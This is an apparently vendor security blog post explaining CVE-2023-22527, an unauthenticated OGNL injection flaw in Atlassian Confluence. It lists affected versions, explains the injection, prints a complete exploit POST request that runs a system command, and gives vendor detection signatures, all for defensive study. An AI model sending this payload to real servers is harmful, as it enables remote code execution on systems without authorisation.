CVE-2023-22527: Another OGNL Injection Leads to RCE in Atlassian Confluence

The Blue Report 2023

Analysis of 14m Attack Simulations Reveals Organizations Only Prevent 6 out of Every 10 Attacks.

DOWNLOAD

On January 16, 2024, Atlassian disclosed a remote code execution vulnerability affecting the Confluence Data Center and Confluence Server [1]. CVE-2023-22527 is an OGNL injection vulnerability with a CVSS score of 10 (Critical). Although the vulnerability is fixed with patches, the number of outdated and publicly exposed Atlassian Confluence instances is in the thousands, posing significant risks to organizations.

In this blog, we explained how the Atlassian Confluence CVE-2023-22527 exploit works and how organizations can defend against  CVE-2023-22527 attacks.

Simulate Vulnerability Exploitation Attacks with 14-Day Free Trial of Picus Platform

Atlassian Confluence CVE-2023-22527 Vulnerability Explained

Atlassian Confluence is a collaboration and documentation platform designed to facilitate communication and information sharing within organizations. Confluence Server is a self-hosted version of the platform, allowing organizations to deploy it on their own servers or cloud infrastructure. Confluence Data Center, on the other hand, is an enterprise-grade solution designed for organizations with larger user bases or those with a need for high availability and reliability. On January 16, 2024, Atlassian disclosed an OGNL injection vulnerability affecting the Confluence Data Center and Confluence Server. Adversaries may exploit the CVE-2023-22527 vulnerability for unauthenticated remote code execution in vulnerable Confluence instances. The vulnerability has a CVSS score of 10 (Critical). The affected versions are listed below.

Affected Product

Affected Versions

Confluence Data Center and Server

8.0.x

8.1.x

8.2.x

8.3.x

8.4.x

8.5.0-8.5.3

According to ShadowServer, there are over 11,000 Atlassian Confluence instances publicly exposed, and adversaries are actively scanning for vulnerable instances [2]. Organizations are advised to patch their Atlassian Confluence instances as soon as possible.

Previously, in September 2021 and June 2022, two separate OGNL injection vulnerabilities were found in Atlassian Confluence. For more detailed information, you can check our "Atlassian Confluence Zero-Day CVE-2022-26134 Vulnerability" and "Atlassian Confluence CVE-2021-26084 Vulnerability" blog posts.

What is an OGNL Injection Attack?

Object-Graph Navigation Language (OGNL) is a Java-based expression language commonly employed in frameworks and applications like Apache Struts and Atlassian Confluence. OGNL provides a concise syntax for expressing complex operations on Java objects, enabling developers to access and manipulate properties, invoke methods, and navigate object relationships in a concise and expressive manner. 

When applications do not properly validate and sanitize user input before using it in OGNL expressions, it may lead to a security vulnerability called OGNL injection. In OGNL injection attacks, adversaries input specially crafted strings containing OGNL expressions into user interfaces or input fields. When the application processes this input without proper validation, the injected OGNL expressions get executed within the application's context. This can lead to a range of security issues, including unauthorized access to sensitive data and remote code execution.

How Atlassian Confluence CVE-2023-22527 Exploit Works?

Atlassian Confluence CVE-2023-22527 vulnerability is an OGNL injection vulnerability that allows unauthenticated adversaries to execute arbitrary commands remotely in a vulnerable Confluence instance. The vulnerability stems from a Velocity template file named "text-inline.vm" [3]. This file allows adversaries to execute commands by using the expression "#request['.KEY_velocity.struts2.context'].internalGet('ognl')". An example payload delivered via an HTTP POST request is given below.

//Attacker-crafted POST request

POST /template/aui/text-inline.vm HTTP/1.1
Host: <vulnerable_Confluence_instance>
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 243

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,%7b%7d)%2b\u0027&x=(new freemarker.template.utility.Execute()).exec(%7b%22whoami%22%7d)

Atlassian Confluence CVE-2023-22527 Vulnerability Exploit Example

How Picus Helps Simulate Atlassian Confluence CVE-2023-22527 Attacks?

We also strongly suggest simulating the Atlassian Confluence CVE-2023-22527 Vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Citrix Bleed, Follina, and Log4Shell, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Atlassian Confluence CVE-2023-22527 vulnerability exploitation attacks:

Threat ID

Threat Name

Attack Module

58423

Atlassian Confluence Web Attack Campaign

Web Application

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Atlassian Confluence CVE-2023-22527 vulnerability and other vulnerability exploitation attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Atlassian Confluence CVE-2023-22527 vulnerability:

Security Control

Signature ID

Signature Name

Check Point NGFW

asm_dynamic_prop_CVE_2023_22527

Atlassian Confluence Template Injection (CVE-2023-22527)

Citrix

999956

an error in value conversion in apache struts 2 before 2.2.3.1 could lead to ognl rce via http form field

F5 BIG-IP

200004274

FreeMarker Template Injection template.utility (Parameter)

Forcepoint NGFW

 

HTTP_CRL-Confluence-Template-Injection-CVE-2023-22527

Fortiweb

060050053

Generic Attacks(Extended)

Imperva SecureSphere

 

Template Injection - 6

Modsecurity

932100

Remote Command Execution: Unix Command Injection

Palo Alto

92195

FreeMarker Server Side Template Injection Vulnerability

Snort

1.1002.19

SERVER-IIS cmd.exe access

Trend Micro TippingPoint

43721

HTTP: Atlassian Confluence Data Center and Server Template Injection Vulnerability

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial of the Picus Complete Security Validation Platform.

References

[1] "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server." Available: https://confluence.atlassian.com/. [Accessed: Jan. 23, 2024]

[2] "Website." Available: https://twitter.com/Shadowserver/status/1749372138685915645

[3] R. Maini, "Atlassian Confluence - Remote Code Execution (CVE-2023-22527)," ProjectDiscovery Blog, Jan. 22, 2024. Available: https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/. [Accessed: Jan. 23, 2024]